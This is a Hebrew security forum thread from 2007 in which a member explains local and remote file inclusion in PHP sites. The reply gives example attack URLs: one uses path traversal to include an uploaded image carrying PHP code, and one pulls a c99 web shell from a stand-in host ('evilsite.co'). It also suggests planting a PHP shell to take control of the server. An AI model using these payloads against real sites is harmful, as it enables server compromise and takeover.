חיפוש

עזרה

הרשמה

התחברות

עדכונים

אבטחת מידע
UnderWarrior Forums : אבטחת מידע

נושא: Local File Inclusion

כותב

הודעה

<< נושא קודם | נושא הבא >>

NoAmK
משתמש מתחיל

הצטרף / הצטרפה: 21 February 2007
משתמש: מנותק/ת
הודעות: 1

נשלח בתאריך: 21 February 2007 בשעה 14:12

| IP רשוּם

מישהו יכול להביא לי מדריך/הסבר על השיטה הזאת זה יהיה ממש טוב

תודה לכל העוזרים!

חזרה לתחילת העמוד

V[i]RuS aka N3tRat
אורח

הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647

נשלח בתאריך: 25 February 2007 בשעה 12:30

| IP רשוּם

הסבר קצת ואגרסיבי יעזור?
אני מניח שכן,
--
ישנם אתרים שמתוכנתים בצורה כזאת שיקחו קטע קוד מדף אחר או אפילו מקובץ TXT עם הקוד.
למשל כזה מצב:
texts.php?textname=sqlinj.txt
מצב כזה הוא לוקח את הקוד או אפילו סתם שורות טקסט על SQL INJ ומדפיס על הדף.
עכשיו למשל תוכל להזריק קוד PHP.
יש ROMOTE וגם LOCAL.
אם יש שרות העלאת קבצים באתר תוכל להעלות קובץ JPEG עם קוד PHP שירוץ כאשר תעשה
לו INCLUSION
בצורה הזאת למשל:
texts.php?textname=../uploads/fileevil.jpeg
כמובן שתוכל גם לעלות קבצי PHP אם האתר מרשה ואז בכלל תוכל להעלות PHP SHELL וישר להכנס ולשלות על השרת אם SAFE MOD=OFF.
יש גם REMOTE FILE INCLUSION.
אותו עיקרון רק שילוב של קובץ משרת אחר למשל:
texts.php?textname=http://evilsite.co/c99shell.php
ישנם עוד מונחים ל FILE INCLUSION הסברתי לך בקצרה מקןןה שהבנת.
סטס.

חזרה לתחילת העמוד

et_gershon
משתמש מתחיל

הצטרף / הצטרפה: 09 September 2006
משתמש: מנותק/ת
הודעות: 21

נשלח בתאריך: 26 February 2007 בשעה 22:10

| IP רשוּם

ב-miiw0rm העלו לא מזמן סרון ענקקקקקק לפריצה עם זה.

תראה אותו, זה ייעזור לך...

חזרה לתחילת העמוד

אם ברצונך להגיב לנושא זה עליך קודם להתחבר
אם אינך רשום/ה כבר עליך להרשם

גרסת הדפסה

אינך יכול/ה לשלוח נושאים חדשים בפורום זה
אינך יכול/ה להגיב לנושאים בפורום זה
אינך יכול/ה למחוק את הודעותיך ותגוביך בפורום זה
אינך יכול/ה לערוך את הודעותיך ותגובותיך בפורום זה
אינך יכול/ה לצור סקרים בפורום זה
אינך יכול/ה להצביע בסקרים בפורום זה